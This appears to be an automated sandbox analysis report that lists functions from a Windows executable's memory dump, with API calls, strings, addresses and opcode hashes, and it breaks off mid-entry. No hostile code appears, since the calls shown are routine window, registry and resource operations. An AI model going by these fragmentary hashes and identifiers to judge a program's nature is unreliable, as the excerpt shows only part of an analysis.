Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 2141747552-1050967733
Opcode ID: c2209bcdfbd28adc721e1377fe9786733053de7d799d58099f27643035934eb9
Instruction ID: b10891c7401b59bbad6ff30169d3e81ae1e5defeabf81acf8e986cfc71eaab60
Opcode Fuzzy Hash: c2209bcdfbd28adc721e1377fe9786733053de7d799d58099f27643035934eb9
Instruction Fuzzy Hash: 39110274900745BFEB10EF62EC86B5E77A8E722318F52467BA410666E2C77C5A08DA0C

Uniqueness

Uniqueness Score: -1.00%

Function 004D91C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58

GetFocus.USER32 ref: 004D922E
GetKeyState.USER32(0000007A), ref: 004D9245
WaitMessage.USER32(?,00000000,004D926C,?,00000000,004D9293), ref: 004D924F

Strings

Wnd=$%x, xrefs: 004D9210

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FocusMessageStateTextWaitWindow
String ID: Wnd=$%x
API String ID: 1381870634-2927251529
Opcode ID: 841a240f890e4b889c6b371fc3f9715ac62fa11c017711956407097141b1dfc6
Instruction ID: c673cddbc745adca3344508b04c918c66e68abf2b34721ac2f7c0cfbe52f55e9
Opcode Fuzzy Hash: 841a240f890e4b889c6b371fc3f9715ac62fa11c017711956407097141b1dfc6
Instruction Fuzzy Hash: 5E118F35604204AFCB01FBA5D862A9DB7F8EB4A704B5149BBF404E7751DB78AE008A59

Uniqueness

Uniqueness Score: -1.00%

Function 004B197C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 004B19BF
RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 004B19DB

Strings

LoadTypeLib, xrefs: 004B19CA
RegisterTypeLib, xrefs: 004B19E6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Type$FullLoadNamePathRegister
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 4170313675-2435364021
Opcode ID: 031e64816dfcab40bc0802984921327133d3323c6490910334c1faf764851a86
Instruction ID: 8ece1fae63f3440495b095563476e4a16d9ec6d2216c806ca2a8dab9ea02ad2b
Opcode Fuzzy Hash: 031e64816dfcab40bc0802984921327133d3323c6490910334c1faf764851a86
Instruction Fuzzy Hash: 1B016570A40208ABD700FB66DC52BDE73ACDB48704FA04477B401E6292DB78AE108668

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA2C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7,?,?,?,00000000), ref: 0040AA40
LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7,?,?,?,00000000), ref: 0040AA57
LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7,?,?,?), ref: 0040AA68

Part of subcall function 004135BC: GetLastError.KERNEL32(0040AA79,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7), ref: 004135BC

Strings

CHARTABLE, xrefs: 0040AA35

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$ErrorFindLastLoadLock
String ID: CHARTABLE
API String ID: 1074440638-2668339182
Opcode ID: 729fa5fbdd04fa08da4aee17b6a5a91d4596a7b24911617425901f88be5c8865
Instruction ID: 223024386014cbcd6611828f1d05543f9286b01788ebd28747f60c109f243f88
Opcode Fuzzy Hash: 729fa5fbdd04fa08da4aee17b6a5a91d4596a7b24911617425901f88be5c8865
Instruction Fuzzy Hash: E70161B4700700CFC708EFA5D9A0E6A77A6AB58314709447EE58157392CB3C8809DF5C

Uniqueness

Uniqueness Score: -1.00%

Function 004FA928, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 004FA938

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000), ref: 00409666

Strings

GetMonitorInfoA, xrefs: 004FA94C
MonitorFromRect, xrefs: 004FA93F
user32.dll, xrefs: 004FA933

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 667068680-2254406584
Opcode ID: 3bc640d196b92b993ca51069712ad3c59e5716b92b8c95b711c17991e39d64de
Instruction ID: 1bcf42a2e93eb479ad3fde3c2373cb2722947a05ee37f937310b8758800ce650
Opcode Fuzzy Hash: 3bc640d196b92b993ca51069712ad3c59e5716b92b8c95b711c17991e39d64de
Instruction Fuzzy Hash: FDF02BD1A01B192AC21179664C41E3B678CCF45350F560D37BE0CAA383E9DE8C1186EB

Uniqueness

Uniqueness Score: -1.00%

Function 004CC9E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(?), ref: 004CC9E8
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004CC9F7

Strings

%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 004CCA6C
(invalid), xrefs: 004CCA7A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: defa8f1fca82172c14982f89c1afd09748000c705deef9cb40b3bd7c6c135c5d
Instruction ID: a14c4468c1b6f66a954b5331bc9c5317439f89c270cfdc59447b137318f7e013
Opcode Fuzzy Hash: defa8f1fca82172c14982f89c1afd09748000c705deef9cb40b3bd7c6c135c5d
Instruction Fuzzy Hash: 7D11FBA440C3919ED340CF6A844472BBAE4AB89708F04496EF9C8D6381E77EC848D777

Uniqueness

Uniqueness Score: -1.00%

Function 004B4814, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,004B4800,00000003,00000000,004B49B7,00000000,004B4B71,?,004B4800,?,00000000,00000000), ref: 004B4861

Strings

SOFTWARE\Microsoft\.NETFramework, xrefs: 004B4834
.NET Framework not found, xrefs: 004B4870
InstallRoot, xrefs: 004B4850

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
API String ID: 47109696-2631785700
Opcode ID: 436e270fa80c2c3165d28ec7e65edfadd2e997f1e18e5e7607456d8cf513a2b5
Instruction ID: 292b85a7d87c047c032ced858ea9190a62875626ebd5834b0ca7d4f2479a2961
Opcode Fuzzy Hash: 436e270fa80c2c3165d28ec7e65edfadd2e997f1e18e5e7607456d8cf513a2b5
Instruction Fuzzy Hash: FCF0AF357001556BEB10BB5A9881B9B6688EBE5315F11803FF585C72A2CB38CC05C769

Uniqueness

Uniqueness Score: -1.00%

Function 004E6B68, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegQueryValueExW.ADVAPI32(?,CSDVersion,00000000,?,?,00000004,?,00000001,00000000), ref: 004E6BA9
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,00000004,?,00000001,00000000), ref: 004E6BCC

Strings

System\CurrentControlSet\Control\Windows, xrefs: 004E6B76
CSDVersion, xrefs: 004E6BA0

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 3677997916-1910633163
Opcode ID: b72835ca19958d7b9c70f7758fee5e6ff6974457f588de5fd98a036814b2440f
Instruction ID: ef716133da27f26e164dc28efe6048059a383d6650070d6584812af6fb281de0
Opcode Fuzzy Hash: b72835ca19958d7b9c70f7758fee5e6ff6974457f588de5fd98a036814b2440f
Instruction Fuzzy Hash: 5FF0A471E0021DAADF10DAE28C45BEF77BCAB15315F1142A7EA10E62C0EB38AB048759

Uniqueness

Uniqueness Score: -1.00%

Function 00480944, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,00480A2C,00000004,00503F6C,004B1F3E,004B2358,004B1E94,00000000,00000B06,00000000,00000000), ref: 0048095A

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

InterlockedExchange.KERNEL32(0050B1A8,00000001), ref: 00480971

Strings

ChangeWindowMessageFilter, xrefs: 00480950
user32.dll, xrefs: 00480955

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 3478007392-2498399450
Opcode ID: 93a8cfa1d00e9ca7a67552f5e2d303d09cd34d9d55648590828eae5e55d5573e
Instruction ID: 82ed8d6df81a7eb36759ba3e4d99f90523ab43b6522357cf758c02494deac435
Opcode Fuzzy Hash: 93a8cfa1d00e9ca7a67552f5e2d303d09cd34d9d55648590828eae5e55d5573e
Instruction Fuzzy Hash: 3FE0ECF0660300BEFA603B726CDAB5F66549764705F104826F000612D3C7BD1888EB58

Uniqueness

Uniqueness Score: -1.00%

Function 004D84C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 004D84C8
GetModuleHandleW.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004D8612), ref: 004D84DB

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Strings

user32.dll, xrefs: 004D84D6
AllowSetForegroundWindow, xrefs: 004D84D1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessThreadWindow
String ID: AllowSetForegroundWindow$user32.dll
API String ID: 1782028327-3855017861
Opcode ID: b853743d22e2c66ca493f9910f5212384f62fda716a8183e1c51bdcc95c703eb
Instruction ID: 01ff5e309ff898dbf5ec2a5a0005d28d63ba7f39e1af1b90be7c3dd21e73c76e
Opcode Fuzzy Hash: b853743d22e2c66ca493f9910f5212384f62fda716a8183e1c51bdcc95c703eb
Instruction Fuzzy Hash: 40D09EB165420235D910A7B69D56F2B635C4AC4708B24882F7C50E2287EE7CFC01916D

Uniqueness

Uniqueness Score: -1.00%

Function 0046A734, Relevance: 6.2, APIs: 4, Instructions: 248sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,00000000,0046AB2A), ref: 0046A7A8
ShowWindow.USER32(00000000,00000004,?,00000000,0046AB2A), ref: 0046A7F0

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowSleepWindow
String ID:
API String ID: 4218995503-0
Opcode ID: 9fbc53804419e7b0c7234f8a30631859a5f7be7269578eb19cefb723f0bf9dd4
Instruction ID: 57b4a933d40b7c800f2b62f91e8823aae61054c9ffa662a57e78534e9b81f7e9
Opcode Fuzzy Hash: 9fbc53804419e7b0c7234f8a30631859a5f7be7269578eb19cefb723f0bf9dd4
Instruction Fuzzy Hash: 1A918C70A00644AFDB00DFA9D841FAEB7F5FB09704F1104A6F500A73A2E679AE54DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00458B5C, Relevance: 6.2, APIs: 4, Instructions: 212COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00458BD1
GetDesktopWindow.USER32 ref: 00458D01
SetCursor.USER32(00000000), ref: 00458D56

Part of subcall function 00465C20: ImageList_EndDrag.COMCTL32(?,-0000000C,00458D31), ref: 00465C3C

SetCursor.USER32(00000000), ref: 00458D41

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorDesktopWindow$DragImageList_
String ID:
API String ID: 617806055-0
Opcode ID: 862a0e732bc527768561bd8066568045f414d4ffcc49ce77f04ee59cba0b1f28
Instruction ID: 5b8a5ffc2676b61429797a4f75449b093ae134768df342a894d9c4663559b162
Opcode Fuzzy Hash: 862a0e732bc527768561bd8066568045f414d4ffcc49ce77f04ee59cba0b1f28
Instruction Fuzzy Hash: C0915B742102088FE700DF29D8D9B5A77E1BBA9305F04859AE8449B376CB78EC4DDF95

Uniqueness

Uniqueness Score: -1.00%

Function 004DF4CC, Relevance: 6.2, APIs: 4, Instructions: 191fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(000000FF,?,00000000,004DF658,?,004DF9BB,00000000,004DF9BB,00000000,004DF78E,?,00000000,?,004DF8B2,00000000,00000000), ref: 004DF634
FindClose.KERNEL32(000000FF,004DF65F,004DF658,?,004DF9BB,00000000,004DF9BB,00000000,004DF78E,?,00000000,?,004DF8B2,00000000,00000000,?), ref: 004DF652

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: c7f4f72c76cf17272b2ec1b7e9a06a414fd53507f82f6bd9c98804eb12204fa4
Instruction ID: 8b8e74085a04a6f720f571eb416698a895ea4a1d3b3b44332f45ca7bd3d9e9bf
Opcode Fuzzy Hash: c7f4f72c76cf17272b2ec1b7e9a06a414fd53507f82f6bd9c98804eb12204fa4
Instruction Fuzzy Hash: 4B819F3090424A9FDF21EFA5C895AEEBBB5EF08304F1041BBE809A3791D7389A55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041672C, Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004167DB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004167F7
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0041686E
VariantClear.OLEAUT32(?), ref: 00416897

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 91199727d6961b42540dbac8dddd4b8886eb87291677ac3a79942a3a37c52e04
Instruction ID: 3729195a26d3938dfdf18e59bcae220f4c3d5881819744d32fab3221a2c6a924
Opcode Fuzzy Hash: 91199727d6961b42540dbac8dddd4b8886eb87291677ac3a79942a3a37c52e04
Instruction Fuzzy Hash: 60410A75A016199BCB61EF59C890BC9B7BDAB48314F0141DAE548A7216DA38EFC08F58

Uniqueness

Uniqueness Score: -1.00%

Function 004115CC, Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,00411778), ref: 004115FF
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00411623
GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041163E
LoadStringW.USER32(00000000,0000FFE8,?,00000100), ref: 004116D9

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 3be31e3b2ea52e5ef1e186d18b649fd06ede5b0a46d106637fc5f32ac6dfc7dd
